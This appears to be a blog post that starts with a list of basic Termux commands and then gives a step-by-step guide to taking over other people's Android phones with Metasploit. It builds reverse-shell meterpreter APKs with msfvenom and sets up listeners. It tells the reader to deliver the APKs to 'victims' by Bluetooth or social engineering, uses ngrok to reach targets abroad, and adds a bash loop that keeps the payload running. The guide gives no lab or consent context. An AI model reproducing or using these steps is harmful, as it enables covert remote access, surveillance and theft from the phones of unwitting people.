Some basic termux commands:
1)ls --version : to see the version
2)ls -a : to see hidden file
3)apt install <pkg name> : to intall the packages
4)ls :to see the files and folders
5)cat <file.txt name> : to see content under files
6)nano : it is the text editor command
7)pwd : present working directory or print working directory
8)cd/<dir name> : to change the dir
9)touch <file/folder name> :to create the new file
10)mkdir <folder name> :to make folder
11)cd .. :to come out of the dir
12)pkg list-all :list all packages
13)ctrl+x :to exit the file or folder
14)mv -v <file/folder name> /sdcard/folder(where you want to move) :to move folder or file command
15)rm <file name> : to remove file
16)rm -vf <folder name> : to remove folder
17)cp <file name> :to copy file
18)uname -m :to know architecture of your device
19)uname -a :to kernal of your device
20)ifconfig :it is utility used for linux machine to configure ,assign,add,delete, control and query network interface in unix or linux.
21)curl ifconfig.me : to know you
22)ping : cmd used to check connectivity
23)chmod :use to change the access mode of user or group or public.
24)echo : to display the line of text.
25)chmod 777 :to give full executable mode.
26)chmod +x * : ##################################################################
27)cal - to show calender
28)af : use to disply the information related to filesystem about total space and availabe space.
30)cat/proc/cpu : it show full information about the cpu.
31)apt install git : to install git
32)wget :it is the linux cmds utility helps us to install/dowmload files from web
"example":- wget URL(paste url here)
TO INSTALL METASPLOIT-FRAMEWORK In TERMUX
->pkf install unstable-repo
->pkg install metasploit (it can take few minutes and it take approx 600mb space to install)
TO SEE THE MS FRAMEWORK
->ls
->cd --
->ls (if you see file name <metasploit-framework> then you use it)
WAY TO ACCESS MS-FRAMEWORK
->TYPE pwd THEN you can see the home working directory like this : data/data/com.termux/files/home the you an simply copy from data to files and paste like as shown below
->cd data/data/com.termux/files/usr/opt +enter then type
->ls here you can see the file name <metasploit-framework>
SOME CMD IN MFS(metasploit framework)
To Launch metasploit framework then you simple type: msfconsole
->help
->banner
->show exploits
->show payloads
->show auxilaries
->search android
NOTE:6500 ports in our system
METASPLOIT_OVER_THE_LAN(this attack works when victim's and attacker on same network)
->to create payload type in termux screen : ./msfvenom -p android/meterpreter/reverse_tcp LHOST=(paste your ip address here) LPORT=<any four digit>e.g:- 8888 -o /sdcard/apkname.apk
after few second apk will be generate and saved in your sdcard(Here sdcard means internal storage)
to check ip address type : ifconfig
NOTE-[Download mix file manager (copy this link <https://mixplorer.en.uptodown.com/android> and paste in your browser and download it. after that go in mix file manager and sign and auto the apk.
and then send it to victims via blurtooth or social engineering]
->type : msfconsole
->use exploit/multi/handler
->set payload android/meterpreter/reverse_tcp
->set lhost <ipaddress via ipconfig>
->set lport <8888> port number should be same.
->exploit
NOTE:[wait for victims to install and open the apk]
->the type: help <it will show all cmd and details ,how to get some information about victim.
PORT_FORWARDING_DEMONSTRATION_WITH_TURNED_ON_ALONG_WITH_HOSTSPOT[It works when a victim sitting in anothe country or state]
->download ngrok for linux from chrome browser then
->open termux and type:- cd /sdcard/download (for save and download ngrok)
->mv ngrok * $HOME - to move ngrok in home
->type:- ls then cd then u see the zip file <ngrok-stable-linux-arm.zip>
->type :- unzip paste here <ngrok-stable-linux-arm.zip> then
->type :- ls to see the ngrok becomes in green colour it means ngrok is install successfully.
->in this step copy your authentication token from dashboard of websites of ngrok where you have downloaded ngrok.
->the paste this authentication token in termux and then hit enter
->here , now your hotspot and data should be on during creating payload.
->then open termux new screen.
NOTE-FIRST YOU WILL HAVE START SESSION BY TYPING :- ./ngrok tcp 8989<any four digit number>
->for generating payload type:- ./msfvenom -p android/meterpreter/reverse_tcp LHOST=<0 TO .io>from ngrok session LPORT=<it is also in ngrok session> -o /sdcard/filename.apk the hit enter
->eg:-./msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=1234 -o /sdcard/filename.apk
then open msfconsole:- then type the following commands
->use exploit/multi/handler
->set payload android/meterpreter/reverse_tcp
->set lhost (from ngrok session screen)
->set lport (here lport number, jab session connect kiya tha ./ngrok tcp 9999 <-this port number.
PORT_FORWARDING_USING_WIFI
NOTE:-first you remove ngrok if you have ,following steps to remove that file
->ls
->rm ngrok
->copy zip file (ngrok)
->rm -rf .zip
->ls to see ngrok file removed or not
Then u can start port forwarding:-
now type :- pkg upgrade && update
->pkg install wget unzip -y
->wget https://github.com/Linux-Droid/Ngrok/raw/master/Ngrok_linux_Droid.zip the hit enter
->ls to see Ngrok installed or not
->unzip Ngrok.zip(paste here zip file)
->chmod +x Ngrok (to get full permission)
->to start session type :- ./ngrok http 9090<any four digit number>
->./ngrok tcp 8989(optional you can try this if above is failed)
-> rest of procedure is same to generating payload.
NOTE:- after the apk will generated go to mix file manager signa and auto the apk file the send to to the victims
MAKING_OUR_PAYLOAD_PERSISTANT
->install nano :pkg install nano.
->open nano by typing : nano in your termux.
->nano syslogs.sh
write a bash script:-
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity (after -n hit enter the procced)
sleep 5
then type :- cat syslogs.sh to see the bash script
then type :- ls
then copy the syslogs.sh to the sdcard :- cp syslogs.sh /sdcard
now all the process are same to generate payload.
after exploit
type : sysinfo in meterpreter seesion the access to the victims phone and upload apk in his/her system
No comments:
Post a Comment